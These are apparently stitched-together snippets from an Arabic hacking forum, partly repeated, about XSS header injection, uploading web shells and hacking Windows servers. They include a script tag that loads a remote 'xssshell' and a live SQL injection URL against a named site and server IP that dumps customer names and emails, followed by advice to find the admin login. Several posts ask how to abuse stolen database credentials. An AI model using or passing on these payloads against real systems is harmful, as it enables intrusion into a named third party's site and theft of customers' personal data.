مرحبا اعزائي
وجدت ثغرة XSS Headers Injection
باستخدام tamper data استطيع اضافه Expect وبعدها ممكن اكتب اي كود مثلا
***************("Hello")</script>
ويظهر لي hello
بس المشكله لما حاولت ارفع شل XSS ما رضى يصير
عن طريق الكود
********** src="http://mysite.com/xssshell/xssshell.asp" </script>...
رد: فن رفع الشل باي صيغه غصب عن ابوه
مشكووووووووووووووووووور اخي
بس عندي مشكله لما اريد ارفع ملف الهتاكسس يقولي انه موجود من قبل :(
يعني ما اقدر ارفعة :(
السلام عليكم أخي أنا عندي المعلومات ده
Database Name:
Database Host:
Database Port:
Database Username:
Database Password:
كيف استفيد منهم أرجوا الرد عااجل
السلام عليكم أخي أنا عندي المعلومات ده
Database Name:
Database Host:
Database Port:
Database Username:
Database Password:
كيف استفيد منهم أرجوا الرد عااجل
السلام عليكم أخي أنا عندي المعلومات ده
Database Name:
Database Host:
Database Port:
Database Username:
Database Password:
كيف استفيد منهم أرجوا الرد عااجل
السلام عليكم ورحمة الله وبركاتة
والله بصراحة أنا شفت عدة مقاطع في اليوتيوب عن أختراق سيرفرات الويندوز
وحبيت أكتب موضوع وممكن يكون البعض خبير فيها وممكن البعض ما يعرف عنها
أول حاجة لاحضتها أن مو كل السيرفرات راح ينفع نخترقهم..
لكن بتظل طريقة حلوة في الأختراق المهم ما نطول
أول حاجة بعد ما...
SQL Injection
has been discovered
Server:
64.151.83.138
Site:
www.abs.com.pe
Vulnerability:
http://www.abs.com.pe/detalle_promocion.php?id=-14%20UNION%20SELECT%201,group_concat%28id_cliente,0x3a,apellidos_cliente,0x3a,email_cliente%29,3,4,5,6%20from%20clientes--
Just Find the Admin login page...